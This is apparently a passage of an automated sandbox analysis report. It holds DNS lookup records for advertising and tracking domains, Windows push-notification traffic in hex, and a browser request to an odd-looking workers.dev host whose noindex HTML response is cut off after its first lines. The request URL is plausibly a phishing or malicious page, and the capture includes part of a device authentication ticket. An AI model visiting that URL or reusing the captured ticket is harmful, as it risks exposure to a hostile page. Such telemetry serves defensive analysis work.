                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.284048080 CEST1.1.1.1192.168.2.60xeb6aNo error (0)bat-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.284048080 CEST1.1.1.1192.168.2.60xeb6aNo error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.284048080 CEST1.1.1.1192.168.2.60xeb6aNo error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.295835018 CEST1.1.1.1192.168.2.60x7cd5No error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.295835018 CEST1.1.1.1192.168.2.60x7cd5No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.295835018 CEST1.1.1.1192.168.2.60x7cd5No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.295835018 CEST1.1.1.1192.168.2.60x7cd5No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.295835018 CEST1.1.1.1192.168.2.60x7cd5No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:03.297511101 CEST1.1.1.1192.168.2.60x274bNo error (0)cdn.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.221460104 CEST1.1.1.1192.168.2.60x8669No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.221460104 CEST1.1.1.1192.168.2.60x8669No error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.221460104 CEST1.1.1.1192.168.2.60x8669No error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.221460104 CEST1.1.1.1192.168.2.60x8669No error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.221460104 CEST1.1.1.1192.168.2.60x8669No error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.222090960 CEST1.1.1.1192.168.2.60x2ccaNo error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.230715036 CEST1.1.1.1192.168.2.60xf6f2No error (0)ct.pinterest.comwww.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.230715036 CEST1.1.1.1192.168.2.60xf6f2No error (0)www.pinterest.comwww-pinterest-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.230715036 CEST1.1.1.1192.168.2.60xf6f2No error (0)www-pinterest-com.gslb.pinterest.com2-01-37d2-0018.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.230715036 CEST1.1.1.1192.168.2.60xf6f2No error (0)eip-ntt.api.pinterest.com.akahost.net2.18.48.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.231100082 CEST1.1.1.1192.168.2.60xa66eNo error (0)ct.pinterest.comwww.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.231100082 CEST1.1.1.1192.168.2.60xa66eNo error (0)www.pinterest.comwww-pinterest-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.231100082 CEST1.1.1.1192.168.2.60xa66eNo error (0)www-pinterest-com.gslb.pinterest.com2-01-37d2-0018.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.239084005 CEST1.1.1.1192.168.2.60x9656No error (0)rtb.adentifi.com3.220.154.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.239084005 CEST1.1.1.1192.168.2.60x9656No error (0)rtb.adentifi.com44.206.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.239084005 CEST1.1.1.1192.168.2.60x9656No error (0)rtb.adentifi.com52.200.121.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.239084005 CEST1.1.1.1192.168.2.60x9656No error (0)rtb.adentifi.com3.208.227.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.239084005 CEST1.1.1.1192.168.2.60x9656No error (0)rtb.adentifi.com44.218.170.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.239084005 CEST1.1.1.1192.168.2.60x9656No error (0)rtb.adentifi.com54.165.51.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.243870020 CEST1.1.1.1192.168.2.60x9870No error (0)w3-reporting-nel.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.243870020 CEST1.1.1.1192.168.2.60x9870No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.243870020 CEST1.1.1.1192.168.2.60x9870No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.243870020 CEST1.1.1.1192.168.2.60x9870No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.243870020 CEST1.1.1.1192.168.2.60x9870No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.244088888 CEST1.1.1.1192.168.2.60xb35No error (0)w3-reporting-nel.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.503712893 CEST1.1.1.1192.168.2.60xb4fbNo error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.503712893 CEST1.1.1.1192.168.2.60xb4fbNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.503712893 CEST1.1.1.1192.168.2.60xb4fbNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.503712893 CEST1.1.1.1192.168.2.60xb4fbNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.503712893 CEST1.1.1.1192.168.2.60xb4fbNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.504064083 CEST1.1.1.1192.168.2.60x9c5fNo error (0)pixel-config.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.535597086 CEST1.1.1.1192.168.2.60xd5dbNo error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.535597086 CEST1.1.1.1192.168.2.60xd5dbNo error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.535803080 CEST1.1.1.1192.168.2.60xb196No error (0)analytics.tiktok.comanalytics.tiktok.com.ttdns2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.535803080 CEST1.1.1.1192.168.2.60xb196No error (0)analytics.tiktok.com.ttdns2.comanalytics.tiktok.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.957375050 CEST1.1.1.1192.168.2.60x201dNo error (0)psb.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.957731962 CEST1.1.1.1192.168.2.60xcccfNo error (0)psb.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.957731962 CEST1.1.1.1192.168.2.60xcccfNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.957731962 CEST1.1.1.1192.168.2.60xcccfNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.957731962 CEST1.1.1.1192.168.2.60xcccfNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.957731962 CEST1.1.1.1192.168.2.60xcccfNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.963697910 CEST1.1.1.1192.168.2.60xe78bNo error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.963697910 CEST1.1.1.1192.168.2.60xe78bNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.963697910 CEST1.1.1.1192.168.2.60xe78bNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.963697910 CEST1.1.1.1192.168.2.60xe78bNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.963697910 CEST1.1.1.1192.168.2.60xe78bNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:04.966425896 CEST1.1.1.1192.168.2.60xe4ceNo error (0)alb.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.230276108 CEST1.1.1.1192.168.2.60x5cbcNo error (0)cdn.cookielaw.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.230468035 CEST1.1.1.1192.168.2.60x4f69No error (0)cdn.cookielaw.org104.18.87.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.230468035 CEST1.1.1.1192.168.2.60x4f69No error (0)cdn.cookielaw.org104.18.86.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.240787029 CEST1.1.1.1192.168.2.60xc4b9No error (0)trc-events.taboola.comam-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.240787029 CEST1.1.1.1192.168.2.60xc4b9No error (0)am-vip001.taboola.com141.226.228.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.241245031 CEST1.1.1.1192.168.2.60xbe47No error (0)trc-events.taboola.comam-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.251224041 CEST1.1.1.1192.168.2.60x456cNo error (0)cm.g.doubleclick.net142.250.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.492347002 CEST1.1.1.1192.168.2.60xf35fNo error (0)ct.pinterest.comwww.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.492347002 CEST1.1.1.1192.168.2.60xf35fNo error (0)www.pinterest.comwww-pinterest-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.492347002 CEST1.1.1.1192.168.2.60xf35fNo error (0)www-pinterest-com.gslb.pinterest.com2-01-37d2-0018.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.493257999 CEST1.1.1.1192.168.2.60xa820No error (0)ct.pinterest.comwww.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.493257999 CEST1.1.1.1192.168.2.60xa820No error (0)www.pinterest.comwww-pinterest-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.493257999 CEST1.1.1.1192.168.2.60xa820No error (0)www-pinterest-com.gslb.pinterest.com2-01-37d2-0018.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.505712032 CEST1.1.1.1192.168.2.60x3b5fNo error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.505712032 CEST1.1.1.1192.168.2.60x3b5fNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.505712032 CEST1.1.1.1192.168.2.60x3b5fNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.505712032 CEST1.1.1.1192.168.2.60x3b5fNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.505712032 CEST1.1.1.1192.168.2.60x3b5fNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:05.506282091 CEST1.1.1.1192.168.2.60x9474No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:06.000704050 CEST1.1.1.1192.168.2.60x8512No error (0)cdn.cookielaw.org104.18.86.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:06.000704050 CEST1.1.1.1192.168.2.60x8512No error (0)cdn.cookielaw.org104.18.87.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:06.002336979 CEST1.1.1.1192.168.2.60xdc0dNo error (0)cdn.cookielaw.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:06.902478933 CEST1.1.1.1192.168.2.60x22e8No error (0)geolocation.onetrust.com172.64.155.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:06.902478933 CEST1.1.1.1192.168.2.60x22e8No error (0)geolocation.onetrust.com104.18.32.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:06.903146982 CEST1.1.1.1192.168.2.60xc710No error (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:08.702212095 CEST1.1.1.1192.168.2.60x3f9fNo error (0)geolocation.onetrust.com104.18.32.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:08.702212095 CEST1.1.1.1192.168.2.60x3f9fNo error (0)geolocation.onetrust.com172.64.155.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:08.702248096 CEST1.1.1.1192.168.2.60xe35aNo error (0)geolocation.onetrust.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:09.797425985 CEST1.1.1.1192.168.2.60xbfaeNo error (0)ct.pinterest.comwww.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:09.797425985 CEST1.1.1.1192.168.2.60xbfaeNo error (0)www.pinterest.comwww-pinterest-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:09.797425985 CEST1.1.1.1192.168.2.60xbfaeNo error (0)www-pinterest-com.gslb.pinterest.com2-01-37d2-0018.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:09.797425985 CEST1.1.1.1192.168.2.60xbfaeNo error (0)eip-ntt.api.pinterest.com.akahost.net2.18.48.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:09.797509909 CEST1.1.1.1192.168.2.60x9028No error (0)ct.pinterest.comwww.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:09.797509909 CEST1.1.1.1192.168.2.60x9028No error (0)www.pinterest.comwww-pinterest-com.gslb.pinterest.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:43:09.797509909 CEST1.1.1.1192.168.2.60x9028No error (0)www-pinterest-com.gslb.pinterest.com2-01-37d2-0018.cdx.cedexis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                0192.168.2.64971440.113.103.199443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:47 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 4e 4e 73 4a 2f 66 30 69 30 36 58 41 62 50 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 35 34 35 62 38 34 32 63 65 38 64 30 36 35 37 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: sNNsJ/f0i06XAbP3.1Context: 5545b842ce8d0657
                                                                                                                                                                                                                                                                                2024-10-06 14:41:47 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                2024-10-06 14:41:47 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 73 4e 4e 73 4a 2f 66 30 69 30 36 58 41 62 50 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 35 34 35 62 38 34 32 63 65 38 64 30 36 35 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 66 6f 77 71 54 65 43 64 79 53 79 76 77 2b 46 39 52 67 2b 5a 42 61 67 36 54 51 4c 49 56 2b 6a 7a 6c 4a 38 41 53 59 35 44 53 51 34 35 4b 70 55 6c 47 43 54 62 66 57 38 71 66 58 6c 33 6f 77 47 63 72 69 34 41 32 66 46 5a 74 53 32 34 36 73 39 51 41 36 6e 46 48 6b 49 46 65 71 42 32 6b 44 34 57 4d 68 78 76 50 75 59 76 51 2b 45 63
                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: sNNsJ/f0i06XAbP3.2Context: 5545b842ce8d0657<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAafowqTeCdySyvw+F9Rg+ZBag6TQLIV+jzlJ8ASY5DSQ45KpUlGCTbfW8qfXl3owGcri4A2fFZtS246s9QA6nFHkIFeqB2kD4WMhxvPuYvQ+Ec
                                                                                                                                                                                                                                                                                2024-10-06 14:41:47 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 4e 4e 73 4a 2f 66 30 69 30 36 58 41 62 50 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 35 34 35 62 38 34 32 63 65 38 64 30 36 35 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: sNNsJ/f0i06XAbP3.3Context: 5545b842ce8d0657<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                2024-10-06 14:41:47 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                2024-10-06 14:41:47 UTC58INData Raw: 4d 53 2d 43 56 3a 20 69 34 79 69 67 44 63 45 6c 30 4b 76 42 51 33 47 4e 71 44 73 65 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: i4yigDcEl0KvBQ3GNqDsew.0Payload parsing failed.


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                1192.168.2.649719172.67.196.2194433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC706OUTGET /16059c05-eb99-4880-8bcd-d4= HTTP/1.1
                                                                                                                                                                                                                                                                                Host: chattts-49f1.beszyrecala.workers.dev
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:49 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HlXQssVRd7m2CSN6ARy%2FYCnV8G2%2BNJxtjubLMRk2O2kreH9psCIIdzdR5Pg1h1WXUtq7zDXEfK37GoijEICCnDZiqmH53XGXo2e%2FjHHzi74mV8tKTryoISRhFSPquz9TDsWCMO8CONg%2FV2np4VCcslvkSTrR3zk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8ce66a1bab751a07-EWR
                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC749INData Raw: 37 64 34 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f
                                                                                                                                                                                                                                                                                Data Ascii: 7d45<!DOCTYPE html><html><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="robots" content="noindex, nofollow"> <meta name="googlebot" content="noindex, nofollow"> <meta name="viewport" co
